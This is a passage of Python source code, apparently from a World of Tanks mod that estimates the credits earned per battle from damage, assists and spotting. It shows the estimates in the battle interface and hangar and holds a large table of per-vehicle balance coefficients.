self.p__usedItems[equipment][1] for ammo in self.p__hangarAmmo: if self.p__hangarAmmo[ammo][1]: price += self.p__hangarAmmo[ammo][0] * self.p__hangarAmmo[ammo][1] return int(round(price)) def p__onShellsAdded(self, intCD, descriptor, quantity, _, gunSettings): if intCD in self.p__hangarAmmo: self.p__hangarAmmo[intCD][2] = quantity self.p__calc() def p__onShellsUpdated(self, intCD, quantity, *args): if intCD in self.p__hangarAmmo: self.p__hangarAmmo[intCD][1] = self.p__hangarAmmo[intCD][2] - quantity self.p__calc() def p__calc(self, hangar=False): if not p__config.p__data['enabled']: return if not (p__DEBUG or p__DEBUG_COEFF): return assistCoeff = 5 spotCoeff = 100 damageStunCoeff = 7.7 damageSpottedCoeff = 7.5 damageSelfCoeff = 10 defeatCredits = self.p__level * 700 winCredits = self.p__level * 1300 assistCredits = self.p__ASSIST * assistCoeff spotCredits = self.p__SPOT * spotCoeff stunCredits = self.p__DAMAGE_STUN * damageStunCoeff damageMinCredits = self.p__DAMAGE_SELF_SPOT * damageSelfCoeff + (self.p__DAMAGE_UNKNOWN_SPOT + self.p__DAMAGE_OTHER_SPOT) * damageSpottedCoeff damageMaxCredits = (self.p__DAMAGE_SELF_SPOT + self.p__DAMAGE_UNKNOWN_SPOT) * damageSelfCoeff + self.p__DAMAGE_OTHER_SPOT * damageSpottedCoeff outcomeCredits = self.p__battleOutcome() self.p__DefeatResult = int(int(self.p__balanceCoeff * int(defeatCredits + assistCredits + spotCredits + damageMaxCredits + stunCredits) - 0.5) * self.p__premium + 0.5) self.p__DefeatResultMin = int(int(self.p__balanceCoeff * int(defeatCredits + assistCredits + spotCredits + damageMinCredits + stunCredits) - 0.5) * self.p__premium + 0.5) self.p__WinResult = int(int(self.p__balanceCoeff * int(winCredits + assistCredits + spotCredits + damageMaxCredits + stunCredits) - 0.5) * self.p__premium + 0.5) self.p__WinResultMin = int(int(self.p__balanceCoeff * int(winCredits + assistCredits + spotCredits + damageMinCredits + stunCredits) - 0.5) * self.p__premium + 0.5) if not hangar and p__flash: textWinner = self.p__correctedText(self.p__WinResultMin, self.p__WinResult, outcomeCredits) textDefeat = self.p__correctedText(self.p__DefeatResult, self.p__DefeatResult, outcomeCredits) colorWin = '#80D639' colorDefeat = '#FF6347' self.p__textWin = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorWin, self.p__iconCredits, textWinner) self.p__textDEFEAT = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorDefeat, self.p__iconCredits, textDefeat) if self.p__compactDescr not in self.p__tempResults: vehicle = p__BigWorld.player().getVehicleAttached() self.p__tempResults[self.p__compactDescr] = { 'descr' : vehicle.typeDescriptor.type.compactDescr, 'premium' : self.p__premium, 'damage' : self.p__DAMAGE_SELF_SPOT + self.p__DAMAGE_UNKNOWN_SPOT + self.p__DAMAGE_OTHER_SPOT + self.p__DAMAGE_STUN, 'assist' : self.p__ASSIST, 'spot' : self.p__SPOT, 'level' : self.p__level, 'name' : self.p__name.replace(':', '_'), 'repairCost' : int(round(vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth)), 'clearRepair': False, } self.p__tempResults[self.p__compactDescr]['damage'] = self.p__DAMAGE_SELF_SPOT + self.p__DAMAGE_UNKNOWN_SPOT + self.p__DAMAGE_OTHER_SPOT + self.p__DAMAGE_STUN self.p__tempResults[self.p__compactDescr]['assist'] = self.p__ASSIST self.p__tempResults[self.p__compactDescr]['spot'] = self.p__SPOT if self.p__tempResults[self.p__compactDescr]['repairCost'] == self.p__repairCost: self.p__tempResults[self.p__compactDescr]['clearRepair'] = True else: self.p__tempResults[self.p__compactDescr]['clearRepair'] = False p__flash.p__visible(True) p__flash.setCreditsText(self.p__textWin if not self.p__altMode else self.p__textDEFEAT) def p__keyPressed(self, event): player = p__BigWorld.player() if not player.arena: return if player.arena.bonusType != p__ARENA_BONUS_TYPE.REGULAR: return isKeyDownTrigger = event.isKeyDown() if event.key in [p__Keys.KEY_LALT, p__Keys.KEY_RALT]: if isKeyDownTrigger: self.p__altMode = True if event.isKeyUp(): self.p__altMode = False self.p__calc() if event.key in [p__Keys.KEY_LCONTROL, p__Keys.KEY_RCONTROL]: if isKeyDownTrigger: self.p__ctrlMode = True if event.isKeyUp(): self.p__ctrlMode = False self.p__calc() def p__correctedText(self, min, max, outcome): out = '<font color=\"#FF0000\"> -%s</font>' % outcome if outcome else '' if min != max: if self.p__ctrlMode: return '%s[%s]%s' % (min, int(max * 1.05), out) # add 5% to max credits range return '%s%s' % (min, out) return '%s%s' % (max, out) def p__getDebugText(self): debugText = 'Coeff: %s: %s\n' % ('MISS' if self.p__compactDescr not in self.p__COEFFICIENTS else 'FOUND', self.p__balanceCoeff) if self.p__compactDescr not in self.p__COEFFICIENTS: debugText += '\nCredit Calc need learn\non that vehicle\n' if not self.p__tempResults[self.p__compactDescr]['damage']: debugText += 'JUST SUICIDE FAST plz!\n' debugText += 'And wait until battle down\n' else: debugText += 'wrong battle! play again\n' return debugText def p__stopBattle(self): player = p__BigWorld.player() self.p__ctrlMode = False self.p__altMode = False player.arena.onVehicleKilled -= self.p__onVehicleKilled # if player.guiSessionProvider.shared.vehicleState is not None: # player.guiSessionProvider.shared.vehicleState.onVehicleStateUpdated -= self.p__deviceTouched ammoCtrl = player.guiSessionProvider.shared.ammo if ammoCtrl is not None: ammoCtrl.onShellsAdded -= self.p__onShellsAdded ammoCtrl.onShellsUpdated -= self.p__onShellsUpdated p__InputHandler.g_instance.onKeyDown -= self.p__keyPressed p__InputHandler.g_instance.onKeyUp -= self.p__keyPressed p__flash.p__stopBattle() if p__DEBUG: if self.p__compactDescr not in self.p__tempResults: return self.p__compactDescr, self.p__balanceCoeff = self.p__deCode(self.p__tempResults[self.p__compactDescr]['descr']) print 'tempResults', self.p__tempResults[self.p__compactDescr] outcomeCredits = self.p__battleOutcome() textWinner = '~%s' % self.p__correctedText(self.p__WinResultMin, self.p__WinResult, outcomeCredits) textDefeat = '~%s' % self.p__correctedText(self.p__DefeatResultMin, self.p__DefeatResult, outcomeCredits) textWinnerPremium = '' textDefeatPremium = '' if p__BattleReplay.g_replayCtrl.isPlaying: textWinnerPremium = ', With Premium account: ~%s Credits' % self.p__correctedText(int(1.5 * self.p__WinResultMin), int(1.5 * self.p__WinResult), outcomeCredits) textDefeatPremium = ', With Premium account: ~%s Credits' % self.p__correctedText(int(1.5 * self.p__DefeatResultMin), int(1.5 * self.p__DefeatResult), outcomeCredits) price = self.p__hangarOutcome for equipment in self.p__usedItems: if self.p__usedItems[equipment][0]: price += self.p__usedItems[equipment][1] for ammo in self.p__hangarAmmo: if self.p__hangarAmmo[ammo][1]: price += self.p__hangarAmmo[ammo][0] * self.p__hangarAmmo[ammo][1] consumables = int(round(price)) print '#' * 40 print 'Credits Calculate mode' print 'VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[self.p__compactDescr]['name'], self.p__tempResults[self.p__compactDescr]['level'], self.p__compactDescr) print 'damage:%s, assist:%s, spot:%s, %s' % (self.p__tempResults[self.p__compactDescr]['damage'], self.p__tempResults[self.p__compactDescr]['assist'], self.p__tempResults[self.p__compactDescr]['spot'], 'clear repaired' if self.p__tempResults[self.p__compactDescr]['clearRepair'] else 'not cleared repair') print 'damage detail: selfSpot:%s, unkwnSpot:%s, othrSpot:%s, forStunned:%s, ' % (self.p__DAMAGE_SELF_SPOT, self.p__DAMAGE_UNKNOWN_SPOT, self.p__DAMAGE_OTHER_SPOT, self.p__DAMAGE_STUN) print 'coeff:%s, premCoeff:%s' % (self.p__balanceCoeff, self.p__tempResults[self.p__compactDescr]['premium']) print 'repairCost:%s[%s], consumables:%s' % (-int(round(self.p__repairCost * self.p__balanceCoeff)), -self.p__repairCost, -consumables) amm0 = '' for ammo in self.p__hangarAmmo: amm0 += '%s Credits (%s * %s) ' % (self.p__hangarAmmo[ammo][0] * self.p__hangarAmmo[ammo][1], self.p__hangarAmmo[ammo][0], self.p__hangarAmmo[ammo][1]) if amm0: print 'Ammo: %s' % amm0 print 'WINNER:%s Credits' % textWinner + textWinnerPremium print 'DEFEAT:%s Credits' % textDefeat + textDefeatPremium print '#' * 40 print self.p__getDebugText() self.p__hangarOutcome = 0 self.p__hangarItems = {} self.p__hangarAmmo = {} self.p__killed = False self.p__repairCost = 0 self.p__costRepairs = {} self.p__usedItems = {} def p__hangarMessage(self): if not p__config.p__data['enabled']: return # if not (p__DEBUG or p__DEBUG_COEFF): # return if p__ServicesLocator.hangarSpace is not None and p__ServicesLocator.hangarSpace.inited: self.p__recalculatedMessage = '<font size=\"20\" color=\"#FFE041\">%s</font>\n' % self.p__hangarHeader if self.p__textWin or self.p__textDEFEAT: textWinner = self.p__correctedText(self.p__WinResultMin, self.p__WinResult, 0) textDefeat = self.p__correctedText(self.p__DefeatResult, self.p__DefeatResult, 0) colorWin = '#80D639' colorDefeat = '#FF6347' self.p__textWin = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorWin, self.p__iconCredits, textWinner) self.p__textDEFEAT = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorDefeat, self.p__iconCredits, textDefeat) self.p__recalculatedMessage += ' ' + self.p__textWin + '<font size=\"20\" color=\"#FFE041\"> %s </font>' % self.p__vehicleName + self.p__textDEFEAT self.timerMessage() # p__SystemMessages.pushMessage(p__msg, p__SystemMessages.SM_TYPE.GameGreeting) def timerMessage(self): if not p__config.p__data['hangar_show']: return if p__g_currentVehicle.item: p__flashInHangar.setPosition(p__config.p__data['hangar_x'], p__config.p__data['hangar_y']) # x and y p__flashInHangar.setBackground(p__config.p__data['battle_background'], '0x000000', 0.4) # change to false if dont want p__flashInHangar.setText(self.p__recalculatedMessage) # p__SystemMessages.pushMessage(self.p__recalculatedMessage, p__SystemMessages.SM_TYPE.GameGreeting) return p__BigWorld.callback(1.0, self.timerMessage) def p__tester(self, credits, premiumCoeff, winCoeff, level, assist, spot): result = [] winCoeff = 1300 if winCoeff else 700 pool = { 1: (99, 0.1), 2: (999, 0.01), 3: (9999, 0.001), 4: (99999, 0.0001), 5: (999999, 0.00001), } for ranged in pool: boosterCoeff = 0.0 for i in xrange(pool[ranged][0]): boosterCoeff = round(boosterCoeff + pool[ranged][1], ranged) if credits == int(int(boosterCoeff * int(level * winCoeff + assist * 5 + spot * 100) - 0.5) * premiumCoeff + 0.5): result.append(boosterCoeff) if result: if p__DEBUG: print 'search pool: %s' % ranged, pool[ranged], boosterCoeff return result return result def p__sortValues(self, value, debug=False): try: index = self.p__coeffDefaults.index(filter(lambda x: value <= x + 0.0005, self.p__coeffDefaults)[0]) if p__DEBUG or debug: print 'sortValues value: %s=>[%s]<%s' % (self.p__coeffDefaults[index], value, self.p__coeffDefaults[index + 1] if len(self.p__coeffDefaults) > index + 1 else self.p__coeffDefaults[index]) return self.p__coeffDefaults[index] except Exception as e: if p__DEBUG or debug: print 'sortValues error not in range:%s' % value return value def p__sortResult(self, data1, data2, testCoeff): if data1 and data2: check1 = self.p__sortValues(round(sum(data1) / len(data1), 5), p__DEBUG_COEFF) check2 = self.p__sortValues(round(sum(data2) / len(data2), 5), p__DEBUG_COEFF) if check1 == testCoeff or check2 == testCoeff: return testCoeff if check1 == check2: return check1 if check1 in data2: return check1 if check2 in data1: return check2 return 0.0 def p__resultReCalc(self, typeCompDescr, isWin, credits, originalCredits, spot, assist, damage, repair): if p__DEBUG or p__DEBUG_COEFF: print '$$$$$ resultReCalc started' self.p__readJson() vehicleCompDesc, testCoeff = self.p__deCode(typeCompDescr) if vehicleCompDesc in self.p__tempResults: # if self.p__tempResults[vehicleCompDesc]['clearRepair'] and False: # if p__DEBUG or p__DEBUG_COEFF: # print '$$$$$$$$$$$$$$ CLEAR REPAIR MODE $$$$$$$$$$$$$$' # calcRepair = int(round(self.p__tempResults[vehicleCompDesc]['repairCost'] * testCoeff)) # if p__DEBUG or p__DEBUG_COEFF: # level = self.p__tempResults[vehicleCompDesc]['level'] # winCoeff = 1300 if isWin else 700 # print 'VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__tempResults[vehicleCompDesc]['level'], vehicleCompDesc) # print 'level:%s, assist:%s, spot:%s, winCoeff:%s, balanceCoeff:%s' % (level, assist, spot, winCoeff, testCoeff) # print 'repair:%s calcRepair:%s' % (repair, calcRepair) # if repair != calcRepair: # check = round(repair / round(self.p__tempResults[vehicleCompDesc]['repairCost']), 4) # if p__DEBUG or p__DEBUG_COEFF: # print 'repair / calcRepair = %s' % (repair / round(self.p__tempResults[vehicleCompDesc]['repairCost'])) # print 'possible coeffs:', check # print '####2 resultReCalc SAVED coeff[%s]' % check # self.p__compactDescr, self.p__balanceCoeff = self.p__code(typeCompDescr, check) # self.p__readJson() # if p__DEBUG or p__DEBUG_COEFF: # print "####1 '%s': %s," % (self.p__compactDescr,self.p__balanceCoeff) # if p__DEBUG or p__DEBUG_COEFF: # self.p__recalculatedMessage = '<font size=\"20\" color=\"#FFE041\">Credits Calc to %s (id:%s)\nNew coeff:%s assigned, %s to %s</font>\n' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__compactDescr, check, testCoeff, check) # p__BigWorld.callback(1.0, self.timerMessage) # return if not damage: if p__DEBUG or p__DEBUG_COEFF: print '$$$$$$$$$$$$$$ NO DAMAGE MODE $$$$$$$$$$$$$$' checkCorrectedBattleData = credits / float(originalCredits) if p__DEBUG: if checkCorrectedBattleData != 1.5: print '$$$$ BATTLE DATA INCORRECT! PLAY AGAIN $$$$' # premiumCoeff = self.p__premium # if p__BattleReplay.g_replayCtrl.isPlaying: premiumCoeff = 1.0 if checkCorrectedBattleData < 1.01 else 1.5 winCoeff = 1300 if isWin else 700 level = self.p__tempResults[vehicleCompDesc]['level'] result1 = self.p__tester(originalCredits, 1.0, isWin, level, assist, spot) result2 = self.p__tester(credits, 1.5, isWin, level, assist, spot) checkData = int(int(1.0 * int(level * winCoeff + assist * 5 + spot * 100) - 0.5) * premiumCoeff + 0.5) if premiumCoeff > 1.1: coeff1 = round(checkData / originalCredits, 4) else: coeff1 = round(originalCredits / checkData, 4) check = self.p__sortResult(result1, result2, coeff1) if p__DEBUG: print 'VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__tempResults[vehicleCompDesc]['level'], vehicleCompDesc) print 'level:%s, assist:%s, spot:%s, winCoeff:%s, balanceCoeff:%s' % (level, assist, spot, winCoeff, testCoeff) print 'credits:%s originalCredits:%s, checkData:%s' % (credits, originalCredits, checkData) print 'credits / originalCredits = %s' % checkCorrectedBattleData print 'possible coeffs:', check checkOne = check # if check and testCoeff == check: # return # if coeff1 == testCoeff: # return if p__DEBUG: print '#### resultReCalc coeff1[%s] and testCoeff[%s]' % (coeff1, testCoeff) print 'result1 = ', result1 if result1: print 'result1 coeff = %s' % round(sum(result1) / len(result1), 4) print 'result2 = ', result2 if result2: print 'result2 coeff = %s' % round(sum(result2) / len(result2), 4) if p__DEBUG_COEFF: print '$$$$ 1 round coeff:%s' % round(sum(result1) / len(result1), 4), result1 print '$$$$ 2 round coeff:%s' % round(sum(result2) / len(result2), 4), result2 print '$$$$ VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__tempResults[vehicleCompDesc]['level'], vehicleCompDesc) print '$$$$ originalCoeff: %s, possibleCoeff1: %s, possibleCoeff2: %s' % (testCoeff, checkOne, check) self.p__readJson() checkData *= premiumCoeff coeff2 = round(credits / checkData, 4) checkAgain = self.p__sortResult(result1, result2, coeff2) if checkAgain and check != checkAgain: check = checkAgain if p__DEBUG: print '#### resultReCalc coeff2[%s] and coeff1[%s] and check[%s]' % (coeff2, coeff1, check) if coeff1 == coeff2 and coeff1 != 1.0: if p__DEBUG or p__DEBUG_COEFF: print '####1 resultReCalc SAVED coeff[%s] ' % (coeff2) self.p__compactDescr, self.p__balanceCoeff = self.p__code(typeCompDescr, coeff2) self.p__readJson() if p__DEBUG or p__DEBUG_COEFF: print "####1 '%s': %s," % (self.p__compactDescr, self.p__balanceCoeff) else: if check: if p__DEBUG or p__DEBUG_COEFF: print '####2 resultReCalc SAVED coeff[%s]' % check self.p__compactDescr, self.p__balanceCoeff = self.p__code(typeCompDescr, check) self.p__readJson() if p__DEBUG or p__DEBUG_COEFF: print "####2 '%s': %s," % (self.p__compactDescr, self.p__balanceCoeff) if p__DEBUG or p__DEBUG_COEFF: self.p__recalculatedMessage = '<font size=\"20\" color=\"#FFE041\">Credits Calc to %s (id:%s)\nNew coeff:%s assigned, %s to %s</font>\n' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__compactDescr, check, testCoeff, check) p__BigWorld.callback(1.0, self.timerMessage) # del self.p__tempResults[vehicleCompDesc] def p__receiveBattleResult(self, isSuccess, battleResults): # print battleResults playerVehicles = battleResults['personal'].itervalues().next() if not playerVehicles: return assist = max(playerVehicles['damageAssistedRadio'], playerVehicles['damageAssistedTrack'], playerVehicles['damageAssistedStun']) spot = playerVehicles['spotted'] damage = playerVehicles['damageDealt'] repair = playerVehicles['repair'] # 'subtotalCredits', 'factualCredits' # 'credits' - 'eventCredits' self.p__resultReCalc(playerVehicles['typeCompDescr'], battleResults['common']['winnerTeam'] == playerVehicles['team'], playerVehicles['factualCredits'], playerVehicles['originalCredits'], spot, assist, damage, repair) def p__coeffTable(self): self.p__COEFFICIENTS = {'4146125958': 8992455000, '10853840166': 8093209500, '11303985030': 7793461000, '11131707366': 8392958000, '11487377382': 9442077750, '1834270854': 5605296950, '511622982': 5994970000, '2990198406': 5917035390, '17850536262': 8992455000, '5568806022': 5994970000, '4857465990': 6474567600, '21557284710': 10491197500, '3790455942': 6294718500, '11215067526': 7793461000, '3434785926': 8392958000, '4323960966': 4496227500, '5035300998': 9352153200, '11031675174': 7793461000, '12715550406': 8992455000, '11159494086': 8992455000, '11587409574': 7313863400, '11915292870': 8872555600, '867292998': 4316378400, '3168033414': 5994970000, '11765244582': 7553662200, '10970544390': 7793461000, '4679630982': 4376328100, '12476584614': 7793461000, '10770480006': 8692706500, '5213136006': 5976985090, '12031997094': 8992455000, '12804467910': 7793461000, '11203952838': 8992455000, '5835558534': 8992455000, '11309542374': 8992455000, '5657723526': 7793461000, '11926407558': 9442077750, '10981659078': 7793461000, '21468367206': 8392958000, '5746641030': 8392958000, '4946383494': 4376328100, '22685425542': 8392958000, '12721107750': 8992455000, '10803824070': 9591952000, '9269997126': 8992455000, '12359880390': 7313863400, '13071220422': 7793461000, '12104242566': 8992455000, '12898942758': 8992455000, '11409574566': 7793461000, '11398459878': 9442077750, '11209510182': 9831750800, '11559622854': 8992455000, '12209832102': 8932505300, '422705478': 5994970000, '12093127878': 8992455000, '10764922662': 7193964000, '12298749606': 9591952000, '22413115686': 8992455000, '4412878470': 4676076600, '10859397510': 9711851400, '10787152038': 7493712500, '12365437734': 9292203500, '12893385414': 7793461000, '12270962886': 8992455000, '11676327078': 9442077750, '1034013318': 6294718500, '11042789862': 5994970000, '18773055366': 8093209500, '11248411590': 8992455000, '11059461894': 8992455000, '11053904550': 7493712500, '11654097702': 9352153200, '1745353350': 5581317070, '10892741574': 7193964000, '3079115910': 6150839220, '9092162118': 8392958000, '9625667142': 8992455000, '333787974': 6594467000, '11470705350': 7793461000, '12448797894': 8992455000, '11920850214': 9591952000, '11826375366': 8992455000, '3879373446': 6594467000, '13187924646': 5587312040, '11148379398': 8992455000, '11943079590': 8902530450, '21379449702': 7793461000, '11115035334': 8992455000, '9536749638': 8992455000, '4057208454': 7793461000, '4590713478': 5233608810, '12187602726': 8992455000, '12543272742': 8992455000, '12276520230': 8752656200, '13076777766': 8093209500, '12009767718': 8392958000, '11292870342': 8992455000, '11498492070': 8692706500, '5124218502': 4676076600, '12182045382': 8992455000, '689457990': 4795976000, '11837490054': 8692706500, '1300765830': 4244438760, '12120914598': 8932505300, '12454355238': 7193964000, '3968290950': 7193964000, '11381787846': 8832988798, '11320657062': 9292203500, '22863260550': 8992455000, '9803502150': 8992455000, '5302053510': 5143684260, '4501795974': 5185649050, '22596508038': 9442077750, '11476262694': 7793461000, '12987860262': 8992455000, '11326214406': 7793461000, '11659655046': 7793461000, '9003244614': 8662731650, '600540486': 5395473000, '22507590534': 9532002300, '13337972934': 7493712500, '12565502118': 9591952000, '12015325062': 7553662200, '11748572550': 7193964000, '11481820038': 7793461000, '956210502': 4376328100, '11415131910': 9352153200, '11126150022': 7793461000, '11737457862': 9112354400, '9447832134': 9591952000, '12537715398': 8093209500, '2278858374': 6294718500, '778375494': 4196479000, '10948315014': 9412102900, '12626632902': 8992455000, '22296411462': 8992455000, '11026117830': 9591952000, '4235043462': 4658091690, '11648540358': 9591952000, '13160137926': 8992455000, '9358914630': 8392958000, '5390971014': 5545347250, '9714584646': 8992455000, '22418673030': 8992455000, '3612620934': 3956680200, '12810025254': 7793461000, '155952966': 6594467000, '4768548486': 8992455000, '10953872358': 9442077750, '244870470': 6894215500, '11565180198': 9891700500, '12282077574': 5803130960, '12387667110': 9891700500, '11392902534': 7793461000, '9181079622': 8992455000, '67035462': 8392958000, '11298427686': 9891700500, '12921172134': 5994970000, '11120592678': 9352153200, '11854162086': 9292203500, '11231739558': 7793461000, '11570737542': 5395473000} self.p__COEFFICIENTS.update({ # italy # lightTank '55920774' : 8392958000, # 161 italy_It04_Fiat_3000 lvl:1 coeff:1.4 '144838278' : 6594467000, # 417 italy_It05_Carro_L6_40 lvl:2 coeff:1.1 # mediumTank '233755782' : 6894215500, # 673 italy_It06_M14_41 lvl:2 coeff:1.15 '322673286' : 6594467000, # 929 italy_It03_M15_42 lvl:3 coeff:1.1 '411590790' : 5994970000, # 1185 italy_It07_P26_40 lvl:4 coeff:1.0 '500508294' : 5994970000, # 1441 italy_It11_P43 lvl:5 coeff:1.0 '589425798' : 5395473000, # 1697 italy_It10_P43_bis lvl:6 coeff:0.9 '678343302' : 4795976000, # 1953 italy_It09_P43_ter lvl:7 coeff:0.8 '767260806' : 4196479000, # 2209 italy_It14_P44_Pantera lvl:8 coeff:0.7 '17839421574': 8992455000, # 51361 italy_It13_Progetto_M35_mod_46 lvl:8 coeff:1.5 !!!!PREMIUM '856178310' : 4316378400, # 2465 italy_It12_Prototipo_Standard_B lvl:9 coeff:0.72 '945095814' : 4376328100, # 2721 italy_It08_Progetto_M40_mod_65 lvl:10 coeff:0.73 }) self.p__COEFFICIENTS.update({ # sweden # lightTank '44806086' : 8392958000, # 129 sweden_S05_Strv_M21_29 lvl:1 coeff:1.4 '18006141894': 7193964000, # 51841 sweden_S15_L_60 lvl:2 coeff:1.2 !!!!PREMIUM '133723590' : 6606456940, # 385 sweden_S03_Strv_M38 lvl:2 coeff:1.102 '222641094' : 6294718500, # 641 sweden_S12_Strv_M40 lvl:3 coeff:1.05 # mediumTank '311558598' : 6294718500, # 897 sweden_S04_Lago_I lvl:4 coeff:1.05 '400476102' : 6594467000, # 1153 sweden_S02_Strv_M42 lvl:5 coeff:1.1 '489393606' : 5395473000, # 1409 sweden_S07_Strv_74 lvl:6 coeff:0.9 '17917224390': 7193964000, # 51585 sweden_S01_Strv_74_A2 lvl:6 coeff:1.2 !!!!PREMIUM '578311110' : 4795976000, # 1665 sweden_S13_Leo lvl:7 coeff:0.8 '1734238662' : 4196479000, # 4993 sweden_S29_UDES_14_5 lvl:8 coeff:0.7 '18272894406': 9591952000, # 52609 sweden_S23_Strv_81_sabaton lvl:8 coeff:1.6 !!!!PREMIUM '18183976902': 9591952000, # 52353 sweden_S23_Strv_81 lvl:8 coeff:1.6 !!!!PREMIUM '18450729414': 8992455000, # 53121 sweden_S26_Lansen_C lvl:8 coeff:1.5 !!!!PREMIUM '1823156166' : 4316378400, # 5249 sweden_S27_UDES_16 lvl:9 coeff:0.72 '18717481926': 4376328100, # 53889 sweden_S28_UDES_15_16_bob lvl:10 coeff:0.73 '1912073670' : 4376328100, # 5505 sweden_S28_UDES_15_16 lvl:10 coeff:0.73 # heavyTank '667228614' : 4795976000, # 1921 sweden_S18_EMIL_1951_E1 lvl:8 coeff:0.8 '18361811910': 8992455000, # 52865 sweden_S25_EMIL_51 lvl:8 coeff:1.5 !!!!PREMIUM '756146118' : 4376328100, # 2177 sweden_S17_EMIL_1952_E2 lvl:9 coeff:0.73 '845063622' : 4256428700, # 2433 sweden_S16_Kranvagn lvl:10 coeff:0.71 # AT-SPG '933981126' : 6294718500, # 2689 sweden_S09_L_120_TD lvl:2 coeff:1.05 '1022898630' : 5695221500, # 2945 sweden_S20_Ikv_72 lvl:3 coeff:0.95 '1111816134' : 5575322100, # 3201 sweden_S19_Sav_M43 lvl:4 coeff:0.93 '1200733638' : 5875070600, # 3457 sweden_S14_Ikv_103 lvl:5 coeff:0.98 '1289651142' : 5401467970, # 3713 sweden_S08_Ikv_65_Alt_2 lvl:6 coeff:0.901 '1378568646' : 4795976000, # 3969 sweden_S06_Ikv_90_Typ_B_Bofors lvl:7 coeff:0.8 '18095059398': 9591952000, # 52097 sweden_S22_Strv_S1 lvl:8 coeff:1.6 !!!!PREMIUM '1467486150' : 4316378400, # 4225 sweden_S21_UDES_03 lvl:8 coeff:0.72 '1556403654' : 4196479000, # 4481 sweden_S10_Strv_103_0_Series lvl:9 coeff:0.7 '1645321158' : 3776831100, # 4737 sweden_S11_Strv_103B lvl:10 coeff:0.63 }) self.p__COEFFICIENTS.update({ # poland # lightTank '406033446' : 8506862430, # 1169 poland_Pl14_4TP lvl:1 coeff:1.419 '494950950' : 6594467000, # 1425 poland_Pl09_7TP lvl:2 coeff:1.1 '139280934' : 7793461000, # 401 poland_Pl01_TKS_20mm lvl:2 coeff:1.3 !!!!PREMIUM '583868454' : 6594467000, # 1681 poland_Pl06_10TP lvl:3 coeff:1.1 '672785958' : 6102879460, # 1937 poland_Pl07_14TP lvl:4 coeff:1.018 # mediumTank '761703462' : 6021347868, # 2193 poland_Pl12_25TP_KSUST_II lvl:5 coeff:1.0044 '50363430' : 7493712500, # 145 poland_Pl03_PzV_Poland lvl:6 coeff:1.25 !!!!PREMIUM '850620966' : 5395473000, # 2449 poland_Pl10_40TP_Habicha lvl:6 coeff:0.9 '17833864230': 7493712500, # 51345 poland_Pl16_T34_85_Rudy lvl:6 coeff:1.25 !!!!PREMIUM # heavyTank '939538470' : 5143684260, # 2705 poland_Pl11_45TP_Habicha lvl:7 coeff:0.858 '1028455974' : 4742021270, # 2961 poland_Pl13_53TP_Markowskiego lvl:8 coeff:0.791 '317115942' : 8992455000, # 913 poland_Pl08_50TP_prototyp lvl:8 coeff:1.5 !!!!PREMIUM '1117373478' : 4376328100, # 3217 poland_Pl05_50TP_Tyszkiewicza lvl:9 coeff:0.73 '1206290982' : 4256428700, # 3473 poland_Pl15_60TP_Lewandowskiego lvl:10 coeff:0.71 }) self.p__COEFFICIENTS.update({ # japan # lightTank '211526406' : 7793461000, # 609 japan_J01_NC27 lvl:1 coeff:1.3 '1100701446' : 7791063012, # 3169 japan_J02_Te_Ke lvl:2 coeff:1.2996 !!!!PREMIUM '300443910' : 6594467000, # 865 japan_J03_Ha_Go lvl:2 coeff:1.1 '833948934' : 6594467000, # 2401 japan_J04_Ke_Ni lvl:3 coeff:1.1 '1011783942' : 7193964000, # 2913 japan_J06_Ke_Ho lvl:4 coeff:1.2 # mediumTank '122608902' : 7193964000, # 353 japan_J15_Chi_Ni lvl:2 coeff:1.2 '2078793990' : 6594467000, # 5985 japan_J26_Type_89 lvl:2 coeff:1.1 '745031430' : 6594467000, # 2145 japan_J07_Chi_Ha lvl:3 coeff:1.1 '567196422' : 6594467000, # 1633 japan_J09_Chi_He lvl:4 coeff:1.1 '478278918' : 5994970000, # 1377 japan_J08_Chi_Nu lvl:5 coeff:1.0 '17906109702': 8992455000, # 51553 japan_J12_Chi_Nu_Kai lvl:5 coeff:1.5 !!!!PREMIUM '656113926' : 5095724500, # 1889 japan_J10_Chi_To lvl:6 coeff:0.85 '389361414' : 4616126900, # 1121 japan_J11_Chi_Ri lvl:7 coeff:0.77 '18083944710': 8992455000, # 52065 japan_J18_STA_2_3 lvl:8 coeff:1.5 !!!!PREMIUM '18350697222': 8992455000, # 52833 japan_J30_Edelweiss lvl:8 coeff:1.5 !!!!PREMIUM '922866438' : 4136529300, # 2657 japan_J13_STA_1 lvl:8 coeff:0.69 '1189618950' : 4496227500, # 3425 japan_J14_Type_61 lvl:9 coeff:0.75 '1278536454' : 4376328100, # 3681 japan_J16_ST_B1 lvl:10 coeff:0.73 # heavyTank '1634206470' : 6294718500, # 4705 japan_J21_Type_91 lvl:3 coeff:1.05 '1545288966' : 6294718500, # 4449 japan_J22_Type_95 lvl:4 coeff:1.05 '1989876486' : 6294718500, # 5729 japan_J23_Mi_To lvl:5 coeff:1.05 '18172862214': 7193964000, # 52321 japan_J19_Tiger_I_Jpn lvl:6 coeff:1.2 !!!!PREMIUM '1900958982' : 5395473000, # 5473 japan_J24_Mi_To_130_tons lvl:6 coeff:0.9 '1812041478' : 4975825100, # 5217 japan_J28_O_I_100 lvl:7 coeff:0.83 '1723123974' : 4795976000, # 4961 japan_J27_O_I_120 lvl:8 coeff:0.8 '18261779718': 8992455000, # 52577 japan_J29_Nameless lvl:8 coeff:1.5 !!!!PREMIUM '1456371462' : 4256428700, # 4193 japan_J25_Type_4 lvl:9 coeff:0.71 '1367453958' : 4376328100, # 3937 japan_J20_Type_2605 lvl:10 coeff:0.73 # lightTank # '17995027206': None, #51809 japan_J05_Ke_Ni_B lvl:3 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=51809 #ype 98 Ke-Ni Otsu, Этого танка нет ни у кого }) self.p__COEFFICIENTS.update({ # china # lightTank '461606886' : 8506862430, # 1329 